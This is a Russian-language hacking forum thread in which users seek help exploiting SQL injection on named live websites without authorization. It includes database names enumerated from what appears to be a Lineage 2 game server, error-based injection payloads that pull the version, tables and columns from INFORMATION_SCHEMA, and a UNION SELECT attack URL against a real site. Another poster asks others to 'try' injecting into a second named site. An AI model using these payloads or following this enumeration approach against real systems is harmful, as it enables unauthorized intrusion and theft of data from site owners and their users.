Ты правда думаешь, что это ему что-то даст?

2TELO:

5-ая ветка:

http://forum.antichat.ru/showpost.php?p=1118647

Ровно месяц прошел )

Нашёл багу, всё стандартно "You have an error in your SQL syntax",но при подборе столбцов order by вместо Unknown column '100' появляется Unknown column 'foto2' in 'field list'.
Как быть?

Скинуть ссылку..

Ничего не получал, отошли ещё раз.
Скинул в пм.

кидай

С помощью DB_NAME(n) перебирая n я нашел еще
1)master
2)tempdb
3)model
4)msdb
5)lin2db
6)lin2comm
7)l2gloss
8)lin2world
9) lin2log
10)lin2clancomm
SELECT user_name();
SELECT system_user;
SELECT user;
имя юзера stat и имя таблицы с помощью:
DB_NAME() - имя таблицы: lin2world


версия - 1 or 1=@@version--
таблицы - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('и мя таблицы'))--

Проблема в том что запросы такого видв не проходят.
http://darkomen.ru/?go=19&indx=2980+union+select+1,2,@@version,4,5,6, 7,8,9,0,11,12--
Всю информацию я узнал только через union select. И подставлял в запрос вместо цифр DB_NAME(n) user_name() @@version.\
Можно ли с использованием union select сделать что нибудь?
Плиз скажите как с ними работать и что полезного и как из них взять.
Не могу понять почему удаляют пост я не там пишу что ли? Просто очень интересная для меня тема перечитал все мануалы которые нашел. но не могу понять как сделать помогите кто нить пожалусто.

Не получается раскрутить
http://www.carochasolicar.com/detalhesp.php?tipo=4'
Двойной запрос? Попробуйте плз, кому не лень.

по моему это просто раскрытие пути и вовсе не скуля